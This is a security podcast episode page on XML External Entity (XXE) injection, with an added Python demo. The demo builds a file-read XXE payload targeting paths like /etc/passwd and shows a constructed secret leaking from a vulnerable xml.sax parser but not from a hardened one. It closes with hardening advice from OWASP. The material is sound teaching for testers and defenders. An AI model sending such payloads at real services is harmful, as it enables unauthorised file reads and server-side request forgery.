
Dissecting XXE Attacks – Tradecraft Security Weekly #19

When pentesting web services or applications that accept XML, XML External Entity (XXE) injection is a good place to start. By declaring an external entity in the DTD of an otherwise well-formed XML payload before it reaches the server, a penetration tester can make the parser resolve that entity and perform actions the developer never intended. Depending on the parser and its configuration, this can lead to reading local files, server-side request forgery (SSRF), or even remote code execution (RCE). To help penetration testers, Beau Bullock (@dafthack) and Mike Felch (@ustayready) cover several different methods of attacking XML parsers in episode 19 of Tradecraft Security Weekly!

Links: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet
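The file-read case described above, as an added example that is not part of the episode or the OWASP cheat sheet. It uses Python's standard-library xml.sax parser, which resolved external general entities by default before Python 3.7.1 and still does so whenever code turns on feature_external_ges. The <doc>/<data> element names, the secret file written to a temporary directory, and its "db_password=hunter2" content are all constructed for the demo; the payload shape is the classic one: an external entity declared in the internal DTD subset and referenced where the application expects user data.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class DataCollector(ContentHandler):
    """Collects the character data that the application reads from <data>."""

    def __init__(self):
        super().__init__()
        self.in_data = False
        self.text = []

    def startElement(self, name, attrs):
        if name == "data":
            self.in_data = True

    def endElement(self, name):
        if name == "data":
            self.in_data = False

    def characters(self, content):
        # expat may deliver the text in several chunks; accumulate them all
        if self.in_data:
            self.text.append(content)


def xxe_payload(target_uri):
    """Classic file-read XXE: declare an external general entity in the
    internal DTD subset and reference it where the app expects user data.
    target_uri is the SYSTEM identifier the parser will fetch, e.g. file:///etc/passwd."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE doc [\n"
        '  <!ENTITY xxe SYSTEM "%s">\n' % target_uri +
        "]>\n"
        "<doc><data>&xxe;</data></doc>\n"
    )


def parse_data(xml_text, resolve_external_entities):
    """Parse untrusted XML and return the text of <data>.

    resolve_external_entities=True reproduces the vulnerable configuration
    (the pre-3.7.1 default, or any code that enables the feature);
    False is the hardened setting: the parser then expands &xxe; to nothing.
    Setting it explicitly keeps the result independent of the interpreter's default."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = DataCollector()
    parser.setContentHandler(handler)
    parser.parse(io.StringIO(xml_text))
    return "".join(handler.text)


def demo():
    """Write a constructed secret to a temp file, then parse the same XXE payload
    with the vulnerable and the hardened configuration. Returns (leaked, safe)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")  # stands in for /etc/passwd
        with open(secret_path, "w") as f:
            f.write("db_password=hunter2")
        payload = xxe_payload("file://" + secret_path)
        leaked = parse_data(payload, resolve_external_entities=True)
        safe = parse_data(payload, resolve_external_entities=False)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned: %r" % leaked)
    print("hardened parser returned:   %r" % safe)
```

Two caveats a tester should keep in mind. First, this in-band variant only works when the parser echoes the entity's content back (here, via the <data> element); when nothing is reflected, the same SYSTEM identifier can be pointed at an attacker-controlled URL to confirm the parser fetches external resources, which is the SSRF angle mentioned above. Second, disabling external general entities is the minimum fix; the OWASP cheat sheet linked above recommends disabling DTD processing entirely where the parser supports it, since parameter entities offer further paths that a general-entity switch alone does not close.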

Audio: http://traffic.libsyn.com/tswaudio/Dissecting_XXE_Attacks_-_Tradecraft_Security_Weekly_19_converted.mp3
